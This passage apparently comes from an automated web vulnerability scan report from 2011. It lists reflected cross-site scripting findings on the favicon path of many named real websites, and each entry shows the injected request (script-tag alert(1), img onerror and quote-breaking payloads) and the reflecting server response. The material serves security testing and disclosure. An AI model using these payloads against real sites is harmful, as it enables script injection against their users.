Path: | /favicon.ico |
GET /favicon.icocb45a<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mp3raid.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:07:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 5934 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /favicon.icocb45a<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mp3raid.com |
Path: | /favicon.ico |
GET /favicon.icodcd99"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mp3raid.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:07:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 5940 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><TITLE>404 Page Not Fou ...[SNIP]... <a href="http://www.addthis ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mycricket.com |
Path: | /favicon.ico |
GET /favicon.ico8634e</script><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mycricket.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:42:16 GMT Server: Apache X-Powered-By: PHP/5.2.14-pl0-gentoo Set-Cookie: mycricket_rdi=ee713a Content-Type: text/html; charset=utf-8 Content-Length: 30848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>invalid page | Cricke ...[SNIP]... pe="text/javascript"> var hbx=new Object();hbx.vpc="HBX0150 //BEGIN EDITABLE SECTION //CONFIGURATION VARIABLES hbx.acct="DM560614E2 hbx.mlc="/favicon.ico8634e</script><script //alert('tmpl: hbx_page_code_for_error try{ eval ('data = ' + $.cookie('data')); var hbxCommerceVars={}; hbxCommerceVars.pv="0"; //product ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.mylifetime.com |
Path: | /favicon.ico |
GET /255ec'%3b8d549cf0020 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mylifetime.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache Last-Modified: Sat, 02 Apr 2011 13:36:40 GMT X-Pingback: http://www.mylifetime.com X-Lt-Cache: CACHE_PAGE_set X-Lt-Cache-key: http://www.mylifetime.com RealServer: prodweb4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 02 Apr 2011 13:36:42 GMT Date: Sat, 02 Apr 2011 13:36:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 70219 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript" hbx_ad_refresh_page = 'index'; hbx_ad_refresh_apath = '_255ec';8d549cf0020';</script> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.mylifetime.com |
Path: | /favicon.ico |
GET /175d9"><a>3ddeb7ae6ca HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mylifetime.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache Last-Modified: Sat, 02 Apr 2011 13:35:32 GMT X-Pingback: http://www.mylifetime.com X-Lt-Cache: CACHE_PAGE_set X-Lt-Cache-key: http://www.mylifetime.com Realserver: prodweb12 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 02 Apr 2011 13:35:35 GMT Date: Sat, 02 Apr 2011 13:35:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 70249 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <img src="http://pixel ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nydailynews |
Path: | /favicon.ico |
GET /favicon.icoc3df4'%3balert(1)/ User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.nydailynews.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:24:42 GMT Server: Apache Keep-Alive: timeout=3, max=998 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 71163 Set-Cookie: sto-id-sg-web-8080 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="imagetoolbar" content="no" /> <meta property="og:site_name" conten ...[SNIP]... jQuery.cookie('seen_nydn document.location='http:/ } //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.oodle.com |
Path: | /favicon.ico |
GET /favicon.icodee3e"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.oodle.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 02 Apr 2011 13:36:48 GMT Content-Length: 23641 Connection: close Set-Cookie: otu=f0124679080472be Set-Cookie: ots=c3f05fa9a6a425c6 Set-Cookie: a=dT1EMkY4MTExRTREOT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org > <head> <m ...[SNIP]... -_--_--_-"; odl.reporting.replyE cmSetProduction(); cmCreateErrorTag( </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.oodle.com |
Path: | /favicon.ico |
GET /favicon.ico141c5"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.oodle.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 02 Apr 2011 13:36:47 GMT Content-Length: 23718 Connection: close Set-Cookie: otu=4d4e452f05e3458a Set-Cookie: ots=f396da894437be11 Set-Cookie: a=dT1BNUUwMDhCMDREOT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org > <head> <m ...[SNIP]... <meta property="og:url" content="http://www.oodle ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.pronto.com |
Path: | /favicon.ico |
GET /favicon.icoc04d7'><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.pronto.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:24:39 GMT Server: Apache/2.2.4 (Fedora) Content-Type: text/html;charset=ISO Via: CN-5000 Proxy-Connection: Keep-Alive Content-Length: 90396 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ...[SNIP]... <meta content='http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.rent.com |
Path: | /favicon.ico |
GET /favicon.icoee0cd'%3bcb0a88443c6 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.rent.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:36:01 GMT Server: Apache Set-Cookie: session=8bd0d740a1e3 Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:31 GMT Cache-Control: must-revalidate Expires: Sat, 02 Apr 2011 13:36:02 GMT Last-Modified: Sat, 02 Apr 2011 13:36:01 GMT Set-Cookie: browser=1.2108013017 P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA' Content-Type: text/html; charset=utf-8 X-Cache: MISS from www.rent.com Content-Length: 20031 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en" class="no-js"> <head> <title>Error 404: Page Not Found</title> <link href="http://media.rent ...[SNIP]... <script type="text/javascript"> $().ready(function() { next_url = '/favicon.icoee0cd';cb0a88443c6'; ajax_img = 'http://media.rent.com signin_box_state = 'closed'; eval(function(p,a,c,k,e,r ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.rent.com |
Path: | /favicon.ico |
GET /favicon.icof5a25%2522%253e%253ca User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.rent.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:35:49 GMT Server: Apache Set-Cookie: session=10126565fabf Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:20 GMT Cache-Control: must-revalidate Expires: Sat, 02 Apr 2011 13:35:51 GMT Last-Modified: Sat, 02 Apr 2011 13:35:50 GMT Set-Cookie: browser=1.2046613017 P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA' Content-Type: text/html; charset=utf-8 X-Cache: MISS from www.rent.com Content-Length: 20069 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en" class="no-js"> <head> <title>Error 404: Page Not Found</title> <link href="http://media.rent ...[SNIP]... <a id="topbar_signin_link_id ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.reverbnation |
Path: | /favicon.ico |
GET /favicon.ico3eefb<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.reverbnation.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:41:53 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4 X-Powered-By: Cache-Control: no-cache Set-Cookie: _session_id=bdfe329a Content-Length: 21673 Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerCust15535_http <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <a href="/main/global_search ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.shangri-la.com |
Path: | /favicon.ico |
GET /favicon.ico682d8'%3b026f574dde7 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shangri-la.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-WebServer-By: WEB02 X-Powered-By: ASP.NET Access-Control-Allow X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 15288 Vary: Accept-Encoding Cache-Control: private, max-age=60 Date: Sat, 02 Apr 2011 13:45:21 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript"> var share_page_data={}; share_page_data.page_url = 'http://www.shangri-la share_page_data.page_name = "Page Not Found"; </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.shopcompanion |
Path: | /favicon.ico |
GET /1ca3b<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shopcompanion.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: AMOS/1.0 Date: Sat, 02 Apr 2011 14:01:14 GMT Content-Type: text/html; charset=ISO-8859-1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE" Set-Cookie: AMOS_SID=_live_ticks Set-Cookie: AMOS_NS_ID=048; Path=/; Domain=.shopcompanion.com Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion Set-Cookie: AMID=2232139994; Path=/; Domain=.shopcompanion.com Set-Cookie: CATALOGCITY_SSNLIVE111 Set-Cookie: SHOPPER_LOCATION=Monterey Content-Length: 107216 <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="stylesheet" t ...[SNIP]... <span class="span tx_bold">> 1ca3b<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.smarter.com |
Path: | /favicon.ico |
GET /c2201<a>26331e04736 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.smarter.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:33:23 GMT Server: Apache Loader-Time-Used: 0.00018 Set-Cookie: __mmsid=d9c2a77556a5 Set-Cookie: __mmspn=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com Set-Cookie: __mmoff=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com Set-Cookie: __mmuid=66a6612fe3ea Set-Cookie: __mmtrk=-1|||3|4ecd9 Set-Cookie: qry_lnk=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com Set-Cookie: qry_ctxt=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 93179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> c2201<A>26331e04736 ...[SNIP]... <h2>How to Shop Smarter for c2201<a>26331e04736: </h2> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.soft82.com |
Path: | /favicon.ico |
GET /favicon.ico99137<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.soft82.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:16:15 GMT Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 X-Powered-By: PHP/5.3.4 Set-Cookie: PHPSESSID=d833dc533a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 87349 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <BASE href="http://www.soft82 <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title> ...[SNIP]... <strong>www.soft82.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.songmeanings |
Path: | /favicon.ico |
GET /favicon.ico7297a"-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.songmeanings.net Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 14:14:05 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=8v774711o8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 23886 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "http://www.songmeanings ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.songmeanings |
Path: | /favicon.ico |
GET /favicon.ico427ff"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.songmeanings.net Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 14:13:57 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=c3e6n99ocv Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 23916 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <img src="http://b.scorec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.spike.com |
Path: | /favicon.ico |
GET /favicon.ico78520"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.spike.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Content-Type: text/html;charset=utf-8 Cache-Control: max-age=1800 Date: Sat, 02 Apr 2011 13:31:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:44 GMT; path=/ Vary: User-Agent Content-Length: 33753 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv=" ...[SNIP]... <script src="http://repo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.supercheats |
Path: | /favicon.ico |
GET /favicon.icoc0247"%3balert(1)/ User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.supercheats.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:43:02 GMT Server: Apache Vary: Accept-Encoding,User Connection: close Content-Type: text/html Content-Length: 15900 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <script> COMSCORE.beacon({ c1:2, c2:"6035764", c3:"", c4:"http://www.super c5:"", c6:"", c15:"" }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tarot.com |
Path: | /favicon.ico |
GET /favicon.icoe3ca5'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.tarot.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:15:10 GMT Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 02 Apr 2011 14:15:10 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=rkucms4dup Set-Cookie: BCKPHPSESSID=rkucms4 Set-Cookie: userStatObj=Tzo4OiJ1 Set-Cookie: luser=rkucms4dupord0 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 26394 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <link rel="SHORTCUT ICON" href="/favicon.ico"> <!-- ######################### /favicon.icoe3ca5'-alert ...[SNIP]... var random3 = Math.round( Math.random() * 5000230 ); var URL = '' + '&sid=rkucms4dupord0 + '&uid=' + '&pid=a-self-no' + '&site=tarot' + '&pg=/favicon.icoe3ca5'-alert(1)- + '&pq=' + '&rf=' + '&ftr=' + '&rq=' + '&res=' + screen.width + 'x' + screen.height + '&col=' + c + '&brws=' + escape(navigator.appName) + '&brv=' + escape(navigator ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tarot.com |
Path: | /favicon.ico |
GET /favicon.ico2e1a2--><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.tarot.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:15:12 GMT Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 02 Apr 2011 14:15:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=768ks8blt3 Set-Cookie: BCKPHPSESSID=768ks8b Set-Cookie: userStatObj=Tzo4OiJ1 Set-Cookie: luser=768ks8blt3b6jg Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 26531 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <link rel="SHORTCUT ICON" href="/favicon.ico"> <!-- ######################### /favicon.ico2e1a2--><script>alert(1)< copyright 1999-2011, Visionary Networks 10.3.1.24 ######################### ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tarot.com |
Path: | /favicon.ico |
GET /favicon.icob6937"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.tarot.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:15:06 GMT Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 02 Apr 2011 14:15:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=rkh1871d7j Set-Cookie: BCKPHPSESSID=rkh1871 Set-Cookie: userStatObj=Tzo4OiJ1 Set-Cookie: luser=rkh1871d7jsqqn Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 26518 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <link rel="SHORTCUT ICON" href="/favicon.ico"> <!-- ######################### /favicon.icob6937"> ...[SNIP]... <INPUT TYPE="hidden" NAME="returnUrl" VALUE="/favicon.icob6937"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thedailybeast |
Path: | /favicon.ico |
GET /favicon.ico4df34"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thedailybeast.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Type: text/html; charset=UTF-8 Date: Sat, 02 Apr 2011 13:40:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60091 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thedailyshow |
Path: | /favicon.ico |
GET /favicon.icoc4544"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thedailyshow.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Type: text/html;charset=utf-8 Content-Length: 26317 Cache-Control: max-age=1800 Date: Sat, 02 Apr 2011 13:31:49 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title></title> <meta name="description" content= ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thehollyw |
Path: | /favicon.ico |
GET /favicon.icoc583c"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thehollywoodgossip Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:40:10 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: fullsite=true; path=/; domain=.thehollywood Set-Cookie: mut=173.193.214.243 X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=kcfer0dro8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent,Accept Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20009 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thirdage.com |
Path: | /favicon.ico |
GET /favicon.icoad228"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thirdage.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 X-Drupal-Cache: MISS Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 02 Apr 2011 13:41:56 +0000 Cache-Control: public, max-age=600 Set-Cookie: SESSfa98039aa221fd92 Vary: Cookie,Accept-Encoding Web-Head: web09.advomatic.com Content-Type: text/html; charset=utf-8 Content-Length: 30060 Date: Sat, 02 Apr 2011 13:41:56 GMT X-Varnish: 635034219 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Varnish-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <form action="/user/login ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thomasnet.com |
Path: | /favicon.ico |
GET /favicon.ico8619e"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.thomasnet.com Accept: */* Proxy-Connection: Keep-Alive |
